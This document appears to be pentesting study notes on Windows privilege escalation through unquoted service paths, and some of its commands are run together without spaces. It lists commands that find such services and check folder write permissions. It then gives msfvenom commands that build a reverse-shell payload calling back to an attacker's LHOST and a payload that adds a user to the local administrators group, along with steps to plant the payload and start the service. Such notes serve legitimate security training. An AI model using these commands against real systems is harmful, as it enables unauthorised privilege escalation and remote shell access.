-> If there is space between the path and it is not enclosed in double quotes then we can exploit it.
Example:
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
-> How system tries to execute an Unquoted service path
# PowerViewImport-Module./PowerView.ps1Invoke-AllChecksORGet-UnquotedServiceORwmicservicegetdisplayname,pathnameOR# Best oneGet-CimInstance-ClassNamewin32_service|SelectName,State,PathName# PowershellOR# Best onewmicservicegetname,displayname,pathname,startmode|findstr/i"auto"|findstr/i/v"c:\windows\"Found the anomaly unquoted service path? # Services with no quotes & spaces in pathWrite Path and Service name in notes first # Service name can be found in winpeas, Powerviewicacls <Path of the file>Example: C:\Program Files\yolo Apps\Current Version\yolo.exe# TRY IN THIS FASHION ONLY-> icacls C:\Program Files, icacls C:\Program Files\yolo Apps, and vice versa.-> Once we see W or anything on the folder, pick up the next file and put binaryWE WANT W on BUILTIN/USERS or AUTHENTICATED USERS or USERNAME access# ExampleC:\Program Files\yolo Apps\Current Version\yolo.exeicacls C:\Program Files\yolo Apps # Gives W on UsersPut malicious Current.exe in the yolo folder
Exploitation
1) msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<>-fexe-oCommon.exeOR2) addduser.c from shells moduleOR3) msfvenom -p windows/exec CMD='net localgroup administrators user /add'-fexe-service-ocommon.exe2.Victimmachine:1.Placecommon.exein'C:\Program Files\<Unquoted Path Service>'# directly transfer it to place OR using move below# move "C:\users\ted\zen.exe" "C:\program files\zen\zen.exe"2.scstart<service_name>orStart-Service<service_name># Powershell# Just try putting malicious binary, we don't know if it's running every second auto# If the above doesn't work we need to restart, refer service binary module above3.netlocalgroupadministrators# To check if the user was added or nc to listen
